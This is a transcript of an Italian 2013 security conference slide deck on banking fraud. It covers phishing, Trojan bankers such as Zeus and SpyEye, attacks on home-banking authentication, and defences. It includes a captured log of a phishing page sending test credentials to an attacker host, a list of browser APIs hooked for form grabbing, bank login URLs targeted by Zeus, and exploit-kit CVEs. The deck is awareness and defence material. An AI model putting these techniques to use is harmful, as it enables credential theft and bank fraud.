Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si...
-
Upload
gianfranco-tonello -
Category
Software
-
view
108 -
download
3
description
Transcript of Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si...
Stato dell’arte delle truffe bancarie dal
phishing ai Trojan.Banker, come si
diffonde e come ci si difende
Relatori: ing. Gianfranco Tonello, Roberto Spagliccia Milano, 23/10/2013
mercoledì 23 ottobre alle ore 13:00sala Arena Trade - Pad. 1
Frode informatica
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 2
25 Maggio 2012: fonte «Il Mattino di Padova»http://mattinopadova.gelocal.it/cronaca/2012/05/25/news/frode-informatica-ripulito-il-conto-degli-avvocati-di-padova-1.5154231
PhishingTrojan
Banker
A xe sta ea
segretaria!
Ogni riferimento a
persone o fatti è puramente
casuale
Frodi bancarie: tecniche utilizzate
• Phishing: si intende una tecnica attraverso la quale un soggetto malintenzionato (chiamato phisher), riesce a raccogliere dati personali di accesso, tramite tecniche di ingegneria sociale che negli anni si sono fatte sempre più raffinate.
• Trojan Banker: malware in grado di rubare le credenziali di accesso alla propria banca, modificando le schermate di login dei più diffusi siti di home banking.
3
Scopo: rubare denaro dal conto corrente eseguendo bonifici su conti esteri.
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Frodi bancarie: Phishing
La tecnica è quella di inviare email relative al proprio conto corrente, nelle quali si invita il destinatario ad accedere immediatamente al proprio conto, per verificare i propri dati oppure per convalidare vincite o premi che l’istituto ha deciso di erogare.
4«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Phishing con link fraudolento 1/2
5
Link:
http://gfsrtdrhqptyszmvs.siamsensationsthai.com/my/gfsrtdrhqptyszmvs.asp?e=<email>
http://siamsensationsthai.com
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Phishing con link fraudolento 2/2
6«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Phishing con allegato 1/3
7
Allegato
Document-poste-it.html
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Phishing con allegato 2/3
8
Sorgente della pagina: Document-poste-it.html
Nome utente Pluto Paperino
Password paperopoli
Cod. fiscale pltppr73b08g224y
Num. carta 4012 0526 7849 4512
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Phishing con allegato 3/3
9
Analisi traffico di rete
[TCP Porta: 80 SEND src 192.168.1.39 -> dst 85.214.122.107 Len=711 Seq=0x37461cb3 Ack=0xa5b319fc ACK Flags=0x18]POST /ac.php HTTP/1.1Host: zimmerers.de
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0[..]
Content-Type: application/x-www-form-urlencodedContent-Length: 165
utente=Pluto+Paperino&password=paperopoli&codice=pltppr73b08g224y&card1=4012&card2=0526&card3=7849&card4=4512&mese=10&anno=2015&cvv2=941&btn_login.x=36&btn_login.y=8
[TCP Porta: 80 RECEIVE src 85.214.122.107 -> dst 192.168.1.39 Len=203 Seq=0xa5b319fc Ack=0x37461f7a ACK Flags=0x18]HTTP/1.1 302 FoundDate: Mon, 07 Oct 2013 13:31:29 GMTServer: ApacheLocation: http://poste.it[..]
[TCP Porta: 80 SEND src 192.168.1.39 -> dst 62.241.4.35 Len=414 Seq=0x3a538eb3 Ack=0xae867f70 ACK Flags=0x18]GET / HTTP/1.1Host: poste.itUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0[..]
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Phishing: statistiche gennaio – marzo 2013
10
Fonte: Phishing Activity Trends Report 1st Quarter 2013 www.apwg.org
• I siti di phishing sono diminuiti del 20% dal 4° trim. 2012 al 1°trim. 2013
• Le segnalazioni di phishing sono diminuite del 31% da gennaio a marzo 2013
Siti di Phishing - Marzo 2013
Stati Uniti 53,18% Francia 2,38%
Germania 7,40% Russia 2,34%
UK 4,21% Brasile 2,33%
Canada 4,15% Lituania 1,29%
Turchia 3,81% Olanda 1,26%
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
• Aut. a senso unico: Username e password statiche con tastiera fisica/virtuale
• Autenticazione a due fattori: Gridcard e TAN (Transaction Access Number)
• Autenticazione a due fattori: One Time password (OTP)
• Autenticazione a due fattori: OTP via SMS
• Autenticazione a due fattori: OTP via lettore di Smart Card (smart tan)
Autenticazione nell’home banking
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 11
Aut. a senso unico: tastiera fisica
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 12
Descrizione La password è una parola segreta o una stringa di caratteri usata per l’autenticazione. Con statica intendiamo una password costante, che non cambierà nel tempo, a meno che non venga aggiornata. La password viene inserita nel campo «textbox» dell’HTML attraverso la tastiera hardware o virtuale.
Come viene sconfitta I trojan banker possono memorizzare la password attraverso 2 tecniche: keylogging e form grabbing.Un keylogger può memorizzare ogni tasto premuto dall’utente, ma non è in grado di catturare la clipboard. L’utente può memorizzare le sue credenziali in un file e fare un «copia e incolla» per semplicità o per motivi di sicurezza.La tecnica del form grabbing consiste nell’intercettare le richieste API nel browser e memorizzare i dati del web form prima che siano passate ad internet.
Valutazione dei rischi È vulnerabile alla maggior parte dei Trojan Banker
Aut. a senso unico: tastiera virtuale
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 13
Descrizione La tastiera virtuale è stata introdotta in risposta al keylogging e form grabbing. Consiste nel creare una tastiera virtuale sullo schermo con una disposizione casuale dei tasti.
Come viene sconfitta I trojan banker possono memorizzare l’area dell’immagine del tasto premuto oppure registrare un video della sequenza dei tasti premuti. Questo tipo attacco memorizza le informazioni in remoto per essere interpretate successivamente.
Valutazione dei rischi È vulnerabile alla maggior parte dei Trojan Banker con funzionalità screen shot capturing. Non fornisce miglioramenti in termini di sicurezza rispetto alla textbox.
Autenticazione a due fattori: Gridcard e TAN
(Transaction Access Number)
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 14
Descrizione La grid card è una tabella o griglia che contiene di solito 50 codici alfanumerici. Il sistema della grid card può richiedere lo stesso codice più volte.La TAN (Transaction Access Number) è similare alla grid card, contiene una lista di codici.
Come viene sconfitta I trojan banker possono catturare un codice della grid card o TAN, e di eseguire una disposizione bancaria reiterata fino a che non viene richiesto il codice catturato.
Valutazione dei rischi È vulnerabile a Trojan Banker. Questa soluzione non migliora la sicurezza contro keylogger o form grabber.
Inserire il codice
C2 F4 H5
K V M
Autenticazione a due fattori: One Time
password (OTP)
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 15
Descrizione L’OTP (one time password) è una password che è valida solo per una sessione o disposizione. Gli OTP sono basati su algoritmi crittografici One-way e utilizzano chiavi differenti per ogni utente. Ogni OTP utilizzato viene cancellato o messo in una blacklist per non essere utilizzato una seconda volta. Le OTP sono valide solo per un breve periodo di tempo.
Come viene sconfitta I trojan banker possono catturare l’OTP e bloccare l’inoltro alla banca, segnalando all’utente un’errata autenticazione all’home banking. Nel tempo di vita dell’OTP, il trojan banker ha tutte le informazioni necessarie per eseguire una disposizione.
Valutazione dei rischi È vulnerabile a Trojan Banker «sofisticati». Questa soluzione è vulnerabile all’HTML injection e ad altre tecniche.
Autenticazione a due fattori: OTP via SMS
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 16
Descrizione L’OTP (one time password) viene inviata attraverso un SMS. L’OTP è associato alla disposizione da eseguire.
Come viene sconfitta La componente mobile del trojan banker può leggere l’SMS ricevuto e inoltrare il token OTP contenuto ad un server remoto. In questo modo il trojan banker ha tutte le informazioni necessarie per completare l’esecuzione della disposizione.
Valutazione dei rischi È vulnerabile a Trojan Banker «sofisticati» che utilizzano componenti mobile. Questa soluzione è vulnerabile nell’intercettazione dell’SMS.
Esempio di SMS:Fineco – SMS gratuito.Bonifico 10,59 EUR a CC 00001023456 Pluto Paperino.Conferma con SMS PIN 217489 o inoltra questo SMS al *******
Autenticazione a due fattori: OTP via
lettore di Smart Card (smart tan)
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 17
Descrizione Quando viene eseguita una disposizione, il sito della banca mostrerà un codice relativo a quella transazione.Il codice indicato a video dovrà essere inserito nel lettore di smart card, inserendo prima la carta di credito e il suo relativo PIN, e poi digitando il codice indicato dalla banca.In risposta, il lettore restituirà un OTP necessario per concludere l’operazione dispositiva sul sito.
Come viene sconfitta Il Trojan Banker modifica in modo silente la destinazione della disposizione autorizzata, grazie ad un attacco man-in-the-middle, senza che l’utente se ne accorga.
Valutazione dei rischi Molto sicuro, ma è vulnerabile a Trojan Banker che modificano la destinazione della transazione.
Tecniche dei Trojan Banker 1/2
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 18
Trojan Banker
Rubare le credenziali bancarie
Modificare la destinazione della
disposizione
Disposizione eseguita sul conto
del truffatore
Tecniche dei Trojan Banker 2/2
• Keylogging• Screen shot capturing• Browser protected storage• Redirect verso falsi siti bancari• VNC privata / Socks Proxy con Back Connect• Form grabbing (MITB)• SMS grabbing• Manipolazione automatica (passiva e attiva)• Android Banking App repacking
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 19
Form grabbing (MITB)
Internet Explorer
HttpSendRequest (wininet.dll)
HttpSendRequestEx (wininet.dll)
InternetReadFile (wininet.dll)
InternetReadFileEx (wininet.dll)
InternetQueryDataAvailable (wininet.dll)
InternetCloseHandle (wininet.dll)
EncryptMessage (secure32.dll)
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 20
Firefox
PR_Connect (nspr4.dll)
PR_Write (nspr4.dll)
PR_Read (nspr4.dll)
PR_Close (nspr4.dll)
Nspr4.dll
Malwaredll
injection
1
2
3
4Hooked API generiche
GetWindowText, TranslateMessage (user32.dll)
send, WSASend (ws2_32.dll)
Tutti i browser sono vulnerabili: IE, Firefox, Google Chrome, Opera, etc.
Frodi bancarie: Trojan Banker
• Zeus (ZBot – Citadel – ICE IX): file eseguibile che infetta il pc, metodo di diffusione siti infetti o installato da altri malware
• Sinowal: rootkit che infetta il Master Boot Record, metodo di diffusione siti infetti o installato da altri malware
• Trojan.Win32.Banker: file eseguibile che infetta il computer, metodo di diffusione via email
• Carberp / SpyEye / Gataka / IBANK : file eseguibile che infetta il pc, metodo di diffusione siti infetti o installato da altri malware
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 21
Zeus: Il primo trojan banker
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 22
Anno 2007
Nome file ntos.exe, oembios.exe, twext.exe, sdra64.exe
Caratteristiche Web fake; Keylogger; Screen shot capture; Browser protectedStorage; Form grabber: IE/Firefox; Web inject per Internet explorer; Socks proxy con back connection; VNC; Rubare certificati X.509Plugin venduti separatamente
Target Banche US, UK, IT, etc
Zeus: banche italiane sotto il mirino
https://www.gruppocarige.it/grps/vbank/jsp/login.jsp
https://bancopostaonline.poste.it/bpol/bancoposta/formslogin.asp
https://privati.internetbanking.bancaintesa.it/sm/login/IN/box_login.jspe
https://hb.quiubi.it/newSSO/x11logon.htm
https://www.iwbank.it/private/index_pub.jhtml*
https://web.secservizi.it/siteminderagent/forms/login.fcc
https://www.isideonline.it/relaxbanking/sso.Login
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 23
Elenco di alcuni siti di banche italiane trovato all’interno del file di configurazione di Zeus
Trojan Banker: esempi di web inject 1/2
24
Il trojan Banker modifica (lato client) la pagina di login della banca, richiedendo anche la password dispositiva. Gli autori del malwarepossono accedere al conto online della vittima e eseguire bonifici su conti esteri alla sua insaputa.
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Trojan Banker: esempi di web inject 2/2
25
Altro esempio di Web Injection dove viene richiesta anche la password dispositiva.
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Sinowal: plugin per Google Chrome
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 26
Anno 2008
Tipologia Infetta il Master Boot Record, installa plugin o moduli per rubare le credenziali bancarie
Plugin: Content.js; Plugin.dll; msseedir.dll; msdr.dll; lmbd.dll; wsse.dll; mmdd.dll; iexpgent64.dll (Nov. 2012 – ott. 2013)
Caratteristiche Google Chrome plugin; Form Post tracking
Target Banche NL
Sinowal: plugin per Google Chrome
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 27
Wvgimhukax.crx Content.js Plugin.dllTracciatura web
form
Wvgimhukax.crx
Plugin.dll
Content.js
Background.html
Manifest.json
Sinowal: default plugin -> content.js
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 28
Il «default plugin» utilizzato da Sinowal è costituito da 2 moduli:• Content.js• Plugin.dll
Il modulo javascriptmodifica il metodo POST per tutti i form caricati nella pagina web. In questo modo è in grado di leggere la password inserita nel form.
� Content.js
Frodi bancarie: Carberp e OTP
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 29
VIRUS
1
2
3
4
1. L’utente invia le sue credenziali di accesso alla banca: login, password, Pass-keyInternet banking (OTP = One Time Password).
2. Le credenziale vengono intercettate dal virus, che non le inoltra alla banca, ma le memorizza. Il virus visualizza un falso messaggio di inserimento errato di login/password
3. L’utente re-inserisce login/password e un nuovo valore della Pass-key Internet banking.
4. La Banca conferma la correttezza dei dati inseriti e l’utente accede al suo conto online
SpyEye: concorrente di Zeus
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 30
Anno 2010
Nome file Cleansweep.exe
Caratteristiche Web fake; Keylogger; Screen shot capture;Form grabber: POST / GET; Web inject; Socks proxy con back connection; Rubare certificati X.509Plugin venduti separatamenteTerminare «Zeus»
Target Bank of America, banche UK, US, etc
ZITMO: Zeus In The MObile
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 31
Spyeye-In-The-MObile:• Symbian
Login:Password:Num. di cellulare:Modello:
Zeus botnet
SMS:Scarica la seguente app o certificato di sicurezza: <link>
SMS Bank:PIN: <nnnn>
Bonifico eseguito sul conto del
truffatore
1 2
3
4
5
6
7
8
9
10
11
12
Zitmo:• Symbian• Android• Blackberry
Android Banking App: repacking
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 32
APK
decompilazioneAnalisi codice
Modifica del codice
compilazione
packing
Firmato con chiave privata
Google market o di terze parti
Sviluppatore
ricompilazione
repacking
Firmato con chiave privata
Malicious attacker
APK
Bonifico eseguito sul conto del
truffatore
1
2
3
4
5 6
Android Fineco App: esempio di repacking
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 33
com.fineco.it-1\com\fineco\it\datamodel\a\dx.smali
Android Fineco App: esempio di repacking
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 34
SMS:Func=json/G_LOGIN&userID=123&password=abc
Maggiori cause di infezione
• Navigazione su siti non raccomandabili
• Navigazione su siti attendibili ma che sono stati compromessi (infettati)
• Email con allegati infetti o link su siti infetti
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 35
Navigazione su siti non sicuri
• Molti siti poco attendibili includono nelle loro pagine script (principalmente JavaScript o Flash) che sono in grado di scaricare ed eseguire codice sul computer di chi lo sta visitando. Questo può essere tanto più dannoso quanto più alto è il livello di privilegi con il quale è eseguito il browser (ad esempio Administrator).
• Exploit kit: Black Hole, Cool Exploit (sfruttano vulnerabilità)
• Molto spesso questo tipo di siti include pubblicità
fraudolente, ingannevoli o banner pubblicitari che, se cliccati, portano ad altri siti infetti o al download di software dannoso
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 36
Black Hole: Vulnerabilità utilizzate
37
Vulnerabilità Descrizione
CVE-2013-0422 Java
CVE-2012-4681 Java
CVE-2012-1889 Windows
CVE-2012-1723 Java
CVE-2012-0507 Java
CVE-2011-3544 Java
CVE-2011-2110 Adobe Flash Player
CVE-2011-0611 Adobe Flash Player
CVE-2010-3552 Java
CVE-2010-1885 Windows
Vulnerabilità Descrizione
CVE-2010-1423 Java
CVE-2010-0886 Java
CVE-2010-0842 Java
CVE-2010-0840 Java
CVE-2010-0188 Adobe Reader
CVE-2009-1671 Java
CVE-2009-0927 Adobe Reader
CVE-2008-2992 Adobe Reader
CVE-2007-5659 Adobe Reader
CVE-2006-0003 Internet Explorer
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Virus dell’email
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 38
Come mi difendo dai Malware
• Antivirus sempre aggiornato e installato su tutti i pc della rete
• Aggiornare: Windows, Java, Adobe Reader, Adobe Flash Player
• Avere buonsenso nell’uso del computer:
• Verificare la tipologia degli allegati che si salvano, una fattura non sarà di tipo Applicazione
• Verificare la destinazione dei link su cui si clicca
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 39
Conclusioni
• Banche e istituti di credito non richiedono mai la password via email
• Banche e istituti di credito non regalano premiin denaro, normalmente li chiedono!
• Phishing in calo, ma attenzione!
• Autenticazioni bancarie vulnerabili
• Trojan Banker sofisticati e evoluti
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 40
Domande
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 41
Autori
• Ing. Gianfranco Tonello ([email protected])
• Roberto Spagliccia ([email protected])
Grazie per l’attenzione
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 42
Referenze
• http://www.tgosft.it
• Phishing: un'attività che non passa mai di moda: http://www.tgsoft.it/italy/news_archivio.asp?id=408
• Phishing Activity Trends Report 1st Quarter 2013: http://www.apwg.org
• Home banking a rischio! Trojan.Win32.Banker.CS: la nuova frontiera del phishing: http://www.tgsoft.it/italy/news_archivio.asp?id=454
• http://www.tomsguide.com/us/factor-authentication-in-online-banking,review-678-5.html
• http://en.wikipedia.org/wiki/Transaction_authentication_number
• https://www.owasp.org/images/e/e4/AppsecEU09_The_Bank_in_The_Browser_Presentation_v1.1.pdf
• ZeuS Banking Trojan Report: http://www.secureworks.com/cyber-threat-intelligence/threats/zeus/
• SpyEye Malware Infection Framework – Virus Bulletin July 2011 (www.virusbtn.com)
• Mobile Banking Vulnerability: Android Repacking Threat – Virus Bulletin May 2012 (www.virusbtn.com)
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 43